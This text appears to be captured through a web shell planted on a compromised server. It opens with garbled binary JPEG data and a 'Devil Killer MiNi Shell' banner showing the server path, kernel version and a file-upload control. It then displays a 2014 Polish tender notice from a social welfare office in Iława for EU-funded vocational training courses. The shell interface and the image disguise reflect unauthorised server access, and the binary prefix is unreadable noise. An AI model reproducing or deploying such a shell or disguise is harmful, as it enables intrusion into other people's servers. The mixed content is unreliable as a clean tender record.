JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141105/366412-N-2014.html

<p class="kh_header"><b>Iława: Realizację usługi szkoleń zawodowych i kursów dla uczestników i uczestniczek  projektu pn. Masz Okazję - Pomóż Sobie w roku 2014 współfinansowanego przez UE w ramach EFS II etap</b><br>
<b>Numer ogłoszenia: 366412 - 2014; data zamieszczenia: 05.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Grunwaldzka 6a, 14-200 Iława, woj. warmińsko-mazurskie, tel. 89 6484124, faks 89 6499711.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa - ośrodek pomocy społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizację usługi szkoleń zawodowych i kursów dla uczestników i uczestniczek  projektu pn. Masz Okazję - Pomóż Sobie w roku 2014 współfinansowanego przez UE w ramach EFS II etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy przeprowadzenia usługi szkoleń zawodowych i kursów dla uczestników i uczestniczek projektu pn.  Masz Okazję - Pomóż Sobie w roku 2014 współfinansowanego przez UE w ramach EFS  II etap dla 60 osób. Zamawiający zastrzega  sobie, że ilość osób może ulec zmianie +/- 5 osób.. Zajęcia powinny się odbywać według harmonogramu (załącznik nr 9). Czas zajęć liczony jest następująco - 1h = 45 min, po każdej godzinie powinna odbyć się  przerwa 5,10,15 lub 20, przerwa na catering 15 minutowa i 20 minutowa na obiad.

Lp.	Wyszczególnienie	Liczba godzin
1	Pracownik budowlany - -tematyka szkolenia: Ogólne przepisy BHP, ppoż i ochrona środowiska w zawodach budowlanych, rozpoznanie i przygotowanie podłoża, zasady wykonywania przedmiaru i obmiaru robót tynkarskich, dobieranie narzędzi i sprzętu tynkarskiego, tynkowanie, odzież ochronna i środki ochrony osobistej, gipsowanie, malowanie, szpachlowanie, kładzenie gładzi, układanie glazury i terakoty, stawianie ścian kartonowo - gipsowych, podwieszanie sufitów. 	6 osób 80h
35 teoria 
45 praktyka
2	Szkolenie Spawanie TIG I Moduł - tematyka szkolenia: TIG 141 spawanie pachwinowe aluminium (22,21) i jego stopów elektrodą nietopliwą w osłonie gazów obojętnych.	6 osób 120h
teoria 25 h
praktyka 95 h

3	Szkolenie Profesjonalne sprzątanie - tematyka szkolenia: Aktywizacja zawodowa, prawo pracy, bhp i ppoż., technologia prac porządkowych, nowoczesne urządzenia wykorzystywane w procesie sprzątania i konserwacji, zajęcia praktyczne 	15 osób 60h
teoria 20 h
praktyka 40 h
4	Szkolenie Kosmetyczka - tematyka szkolenia: cechy i obowiązki kosmetyczki, urządzenia kosmetyczne, przepisy BHP, zalecenia sanepidu, zasady i warunki przystąpienia do zabiegu kosmetycznego, wywiad i karta klienta, demakijaż i pielęgnacja oczu, twarzy, szyi i dekoltu, preparaty do pielęgnacja i oczyszczania skóry, analiza cery mieszanej, tłustej, dojrzałej, regulacja brwi, henna brwi i rzęs, przedłużanie rzęs techniką 1:1, rodzaje i aplikacja peelingów kosmetycznych, mechaniczne oczyszczanie twarzy, rodzaje i aplikacja maseczek kosmetycznych, usuwanie zbędnego owłosienia twarz, pachy, ręce i nogi, bikini 	10 osób 56 h
26 h teoria
30 praktyka
5	Profesjonalna opiekunka dzieci - tematyka szkolenia: Rozwój dziecka od 4 miesiąca do 12 miesiąca życia, Okres do 1 roku życia dziecka, Okres od 1 do 2 roku życia dziecka, Okres od 2 do 3 roku życia dziecka, Normy rozwojowe dzieci, Rozwój w drugim i trzecim roku życia dzieci, Rozwój psychoruchowy dziecka, Nieprawidłowości rozwoju psychoruchowego u dzieci, Rozwój fizyczny dzieci, Co się dzieje, gdy dziecko dorasta, Napady złości u dzieci, Jak rozwijać sprawność fizyczną niemowlaka, Ćwiczenia zmysłów u niemowląt, Pielęgnacja niemowlaka, Jak opiekować się nadpobudliwym dzieckiem, Choroby wieku dziecięcego, Najlepsze sposoby na uspokojenie i wyciszenie niemowlaka, Najczęstsze zakażenia wieku przedszkolnego, Literatura dziecięca, Zabawy dziecka przedszkolnego, Zabawa z dzieckiem gdy jest leżące, Najbardziej popularne zabawy dla dzieci powyżej 3 roku życia, Zabawa przez śpiew, Jak maluch żegna się z pieluszką?, Żywienie dziecka w 10 miesiącu, Pierwsza pomoc, Standardy jakości opieki i wspierania rozwoju dzieci 	10 osób 60h
40 h teoria
20 praktyka
6	Szkolenie opiekunka osób chorych i starszych Tematyka: ma na celu wyposażenie uczestników w wiedzę i umiejętności w zakresie opieki nad chorymi przewlekle. Anatomia i fizjologia człowieka, pierwsza pomoc, radzenie sobie ze stresem, techniki pomiaru podstawowych parametrów życiowych, podstawowe zasady higieny, higiena żywienia człowieka, pielęgnacja ran przewlekłych, pielęgnowanie i rehabilitacja po zabiegach operacyjnych, metodyka organizacji czasu wolnego 
	120 h 
67 teoria
53 zajęcia praktyczne
7 osób
7	Pokojówka z podstawami języka angielskiego, Tematyka: kurs przygotowuje do podjęcia pracy w ośrodkach branży turystycznej i innych instytucjach posiadających bazę noclegową i/lub konferencyjną. Obejmuje: zasady komunikacji z gośćmi (savoir vivre) i kreowania pozytywnego wizerunku hotelu, typologia i zastosowanie środków chemicznych, podstawowe technologie sprzątania, organizacja pracy przy sprzątaniu pokoju hotelowego i kolejność czynności, w tym procedury związane z wymianą bielizny hotelowej, kontrola prac porządkowo-sanitarnych, współpraca z innymi działami hotelu, bezpieczeństwo i higiena pracy w zakresie usług hotelarskich w kontekście prawodawstwa krajowego i wspólnotowego, podstawowe zwroty i słownictwo  w języku angielskim przydatne w pracy pokojówki	 6 osób 
120 h 
67 h teoria
53 h zajęcia praktyczne
8	Zajęcia z psychologiem  - Celem zajęć jest obniżenie poczucia wyobcowania społecznego, podwyższenie własnej wartości i wiary we własne możliwości, rozwiązywanie sytuacji konfliktowych i determinujących stres, 	4 grupy x 15h
po 15 osób w grupie
9	Zajęcia z doradcą zawodowym - opracowanie Indywidualnych Planów Działania, program zajęć będzie konsultowany z PUP w Iławie, 	4 grupy x 15h
po 15 osób w grupie
10	Indywidualne zajęcia z psychologiem dla osób skierowanych przez Miejski Ośrodek Pomocy Społecznej w Iławie, biorących udział w projekcie, spotkania te powinny się odbyć w końcowej części przedmiotu zamówienia
	40 h 40osób po 1 h
11	Indywidualne zajęcia z doradcą zawodowym dla osób skierowanych przez Miejski Ośrodek Pomocy Społecznej w Iławie, biorących udział w projekcie, spotkania te powinny się odbyć w końcowej części przedmiotu zamówienia dla osób skierowanych przez Miejski Ośrodek Pomocy Społecznej w Iławie	40 h 40osób po 1 h

2. Zamawiający zastrzega sobie, że zajęcia teoretyczne i kursy będą odbywały się na terenie miasta Iławy(wyjątkiem może być Szkolenie Spawacz - przy spełnieniu warunków poniżej dotyczących transportu), w jednym budynku, by zapobiec dezorganizacji szkoleń i uzyskać jak najwyższą frekwencję uczestników i uczestniczek biorących udział w projekcie oraz by zapewnić systematyczny nadzór ze strony Zamawiającego. Szkolenia powinny odbywać się w pomieszczeniach oddzielnych (zamykanych), by kursanci dwóch różnych szkoleń nie przeszkadzali sobie nawzajem. Uczestnikom powinny być zapewnione sale o powierzchni gwarantującej ergonomiczny sposób przeprowadzenia zajęć oraz ogrzane w sezonie grzewczym. Zajęcia praktyczne lub symulacyjne będą odbywały się na terenie miasta Iławy w miejscach wskazanych przez Wykonawcę i zaakceptowanych przez Zamawiającego. 
3. Szkolenie Spawacz może odbywać się poza terenem Iławy, jednak nie dalej niż 30km od miasta Iławy. Ponadto Wykonawca musi zapewnić transport dla uczestników szkolenia, koszty transportu ująć w całkowitym koszcie szkolenia. Po odpisaniu umowy Wykonawca musi dostarczyć kserokopie dokumentów potwierdzone, za zgodność z oryginałem, potwierdzających ubezpieczenie samochodu i aktualny przegląd pojazdu. W dniu wyjazdy, pierwszego dnia Wykonawca ma obowiązek przyprowadzić samochód pod Miejski Ośrodek Pomocy Społecznej w Iławie, w celu kontroli policyjnej kontroli pojazdu. Zamawiający zastrzega sobie, że Wykonawca musi wystosować skierowanie do KPP w Iławie na cztery dni przed datą pierwszego wyjazdu. Po ustaleniu godziny kontroli należy powiadomić Zamawiającego pisemnie.
4. Zamawiający zastrzega sobie, żeby lokal/sala, w którym będą przeprowadzane zajęcia praktyczne i teoretyczne, winien być przystosowany dla osób niepełnosprawnych. Ponadto Wykonawca zapewnia pomoc w poruszaniu się osobie niepełnosprawnej na terenie lokalu, w którym odbywają się szkolenia.
5. Szkolenie zawodowe musi odbywać się zgodnie z planem nauczania. Zajęcia teoretyczne i symulacje nie powinny trwać dłużej niż do godziny 16:00. 
6. Wykonawca składa też preliminarz kosztów szkolenia zawarty w kartach szkoleń (załącznik nr 5) z wyspecyfikowaniem: ogólnego kosztu szkolenia, kosztów szkolenia z uwzględnieniem zmniejszenia ilości uczestników (co jedną osobę), wydatków na materiały, badania, odzież, transport, kosmetyczkę-starter itp. wykorzystywane w trakcie szkolenia, wysokość narzutu i zysku, innych wydatków związanych z organizacją i prowadzeniem kursu np. koszty wynajmu sal, sprzętu itp. oraz uroczystego zakończenia szkoleń.
7. Wymagane jest złożenie oświadczenia przez Wykonawcę o zapewnieniu sal wykładowych i zaplecza dydaktycznego (wg załącznika nr 6).
8. Pozostałe warunki jakie należy wziąć pod uwagę przy opracowywaniu formularza ofertowego, preliminarza kosztów, programu szkolenia (kursu) oraz jego organizacji: 
- ilość godzin teoretycznych szkolenia nie powinna przekroczyć 8 godzin w ciągu dnia,
- należy zapewnić osobom na czas trwania szkolenia (kursu) składający się z kawy, herbaty, soków, wody mineralnej, ciastek kruchych i ciastek czekoladowych; 
- należy zapewnić obiad, przez obiad rozumie się II danie (ziemniaki, mięso/ryba, surówka), 
- należy zapewnić uczestnikom i uczestniczkom zajęć materiały szkoleniowe z logo EFS dla wszystkich uczestników i uczestniczek (teczka, długopis, zeszyt) oraz w temacie każdego ze szkoleń Wykonawca zapewnia co najmniej 1 publikację, podręcznik lub książkę ,
- Wykonawca zobowiązany jest do ubezpieczenia od nieszczęśliwych wypadków wszystkie osoby biorące udział w szkoleniach (od pierwszego do ostatniego dnia szkolenia).
- Wykonawca zapewni warunki zgodne z przepisami BHP w trakcie trwania szkolenia,
- Wykonawca pokryje koszty niezbędnych, wymaganych badań lekarskich (jeżeli specyfika szkolenia tego wymaga). Koszt badań, wyrobienia książeczki zdrowia itp. należy ująć w cenie kursu,
- Wykonawca pokryje koszt zakupy kosmetyczki/torby dla uczestniczek szkolenia Kosmetyczka, wraz z wyposażeniem składającym się z: zestawu pędzli (min. aplikator do błyszczyków, aplikator do cieni), tusz do rzęs, paleta do makijażu, puder w kamieniu:
	36 cieni 
	36 błyszczyków
	6 róży
- Wykonawca pokryje koszt zakupu odzieży ochronnej (jeżeli specyfika szkolenia tego wymaga). Koszt ten należy ująć w cenie kursu,
- Wykonawca ujmie w cenie kursu też koszt uroczystego zakończenia szkoleń związanego z rozdaniem zaświadczeń, certyfikatów lub dyplomów (w koszt należy wliczyć: salę z zapewnieniem miejsc siedzących dla 70 osób, oraz poczęstunek - w formie kawy, herbaty, wody mineralnej, kanapek z szynką, serem, pomidorem i ogórkiem - min. po 2 kanapki na osobę, ciasto sernik - min. po 1 kawałku na osobę i ciasto jabłecznik - min. po 1 kawałku na osobę),
- Zamawiający zastrzega sobie, że w czasie trwania szkolenia, na miejscu (w Iławie) była osoba reprezentująca Wykonawcę, którą będzie kontrolowała organizację szkolenia i na bieżąco rozwiązywała ewentualne problemy lub zastrzeżenia co do realizacji przedmiotu zamówienia lub umowy zgłaszane przez Zamawiającego,
- należy przeprowadzić ankietę ewaluacyjną na początku i na końcu szkoleń,
- Wykonawca jest zobowiązany do promocji Europejskiego Funduszu Społecznego poprzez oznaczenia pomieszczeń, w których realizowany jest projekt oraz materiałów szkoleniowych zgodnie z  wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki zamieszczonymi na stronie internetowej: www.efs.gov.pl lub www.mrr.gov.pl lub www.funduszestrukturalne.gov.pl.
- należy na bieżąco informować Zamawiającego o przypadkach nieobecności osób na szkoleniu w trakcie jego trwania
- należy zapewnić możliwość kontroli przebiegu szkolenia uprawnionemu pracownikowi MOPS w Iławie
- należy przekazać Zamawiającemu po zakończeniu szkolenia sprawozdanie końcowe, które będzie zawierało informacje o usługach świadczonych przez Wykonawcę w całym okresie realizacji usługi 
oryginały list obecności uczestników i uczestniczek szkoleń
imiennego wykazu osób, które nie ukończyły szkolenia,
kserokopii zaświadczeń i certyfikatów  świadczących o ukończeniu szkolenia, kserokopie zaświadczeń i certyfikatów winny być potwierdzone za zgodność z oryginałem oraz w formacie A4, skopiowane w sposób umożliwiający upięcie w teczkach podopiecznych z zachowaniem lewego marginesu, 
kserokopii dziennika zajęć,
po jednym egzemplarzu materiałów używanych podczas szkoleń,
- szkolenie winno zakończyć się wydaniem zaświadczenia o jego ukończeniu zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z dnia 17 lutego 2012 r.)
- jednostka szkoleniowa zobowiązana jest każde szkolenie/kurs/zajęcia wpisać do bazy  na portalu rządowym http://www.inwestycjawkadry.info.pl/. 
9. Wykonawca zobowiązuje się do przedłożenia, w dniu podpisania umowy, harmonogramu szkolenia oraz dokumentów potwierdzających aktualne ubezpieczenie oraz przegląd samochody.
10. Listy osób przypisanych do określonych grup zostaną przedłożone Wykonawcy najpóźniej w dniu podpisaniu umowy przez pracownika MOPS w Iławie.
11. Wykonawca po podpisaniu umowy, a przed rozpoczęciem zajęć/ kursów, zobowiązuje się zorganizować spotkanie organizacyjne dla wszystkich kursantów. Celem tego spotkania będzie przedstawienie zaplanowanej organizacji szkoleń, odpowiedzi na pytania kursantów, oraz zebranie danych niezbędnych do dalszej współpracy z kursantem, w szczególności numery telefonów, adresy poczty internetowej lub innych wskazanych sposobów do kontaktów kursantami. 
12. Wykonawca zobowiązuje się do samodzielnego informowania kursantów o ewentualnych zmianach, przewidzianych w umowie, bez pośrednictwa Miejskiego Ośrodka Pomocy Społecznej w Iławie. Wykonawcy zobowiązuje się do bieżącego informowania wszystkich uczestników o rozpoczęciu szkoleń. Ponadto Wykonawca na pierwszych zajęciach rozda wszystkim uczestnikom imienne harmonogramy szkoleń.
13.	Grupowe zajęcia z psychologiem oraz grupowe zajęcia z doradcą zawodowym są obowiązkowe dla wszystkich uczestników projektu, wobec powyższego należy tak ułożyć harmonogram zajęć, aby zajęcia nie pokrywały się terminami. 
12. Wykonawca zobowiązuje się zakończyć szkolenia do dnia 22 grudnia 2014, uroczyste zakończenie do dnia 23 grudnia 2014 r.
13 Oznaczenie wg Wspólnego Słownika Zamówień Kody CPV: 80530000-8 usługi szkoleń zawodowych, 80570000-0 usługi szkolenia w dziedzinie rozwoju osobistego, 80580000-3 oferowanie kursów językowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0, 80.58.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w zakresie warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Wykonawca składa oświadczenie o spełnianiu warunku zgodnie z załącznikiem nr 2 do siwz. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne dokonywana będzie na zasadzie spełnia/nie spełnia, tj. zgodnie z zasadą czy dokumenty zostały załączone do oferty i czy spełniają określone wymagania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dla uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, Zamawiający żąda, by Wykonawca dołączył do oferty wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie - załącznik nr 4. 
Warunek ten będzie uznany za spełniony, w przypadku gdy Wykonawca wykaże, że przeprowadził co najmniej 1 szkolenie w zakresie zgodnym z kierunkiem każdego zamawianego szkolenia w wymienionym okresie czasu. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne dokonywana będzie na zasadzie spełnia/nie spełnia, tj. zgodnie z zasadą czy dokumenty zostały załączone do oferty i czy spełniają określone wymagania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w zakresie warunku posiadania do dyspozycji potencjału technicznego Wykonawca składa oświadczenie o spełnianiu warunku zgodnie z załącznikiem nr 2 do siwz, że dysponuje potencjałem technicznym do wykonania zamówienia oraz oświadczenie o dysponowaniu salami dydaktycznymi - zgodnie z załącznikiem nr 6 do siwz. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne dokonywana będzie na zasadzie spełnia/nie spełnia, tj. zgodnie z zasadą czy dokumenty zostały załączone do oferty i czy spełniają określone wymagania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dla uznania, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia zamawiający żąda, by wykonawca dołączył do oferty oświadczenie o spełnianiu warunku zgodnie z załącznikiem nr 2 do siwz.
 - dla uznania, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający żąda by Wykonawca dołączył do oferty wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, a w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 11. Warunek ten będzie uznany za spełniony w przypadku, gdy wykonawca wykaże, że dysponuje kadrą wykładowców posiadającą kwalifikacje zgodne z kierunkiem prowadzonego przez nich szkolenia. Wykonawca musi wykazać, że dysponuje taką ilością kadry, jaka zapewni prawidłowe wykonanie zamówienia zgodnie z harmonogramem. Doświadczenie wykładowców musi wynosić powyżej 1 roku. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne dokonywana będzie na zasadzie spełnia/nie spełnia, tj. zgodnie z zasadą czy dokumenty zostały załączone do oferty i czy spełniają określone wymagania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w zakresie warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Wykonawca składa oświadczenie o spełnianiu warunku zgodnie z załącznikiem nr 2 do siwz. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne dokonywana będzie na zasadzie spełnia/nie spełnia, tj. zgodnie z zasadą czy dokumenty zostały załączone do oferty i czy spełniają określone wymagania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
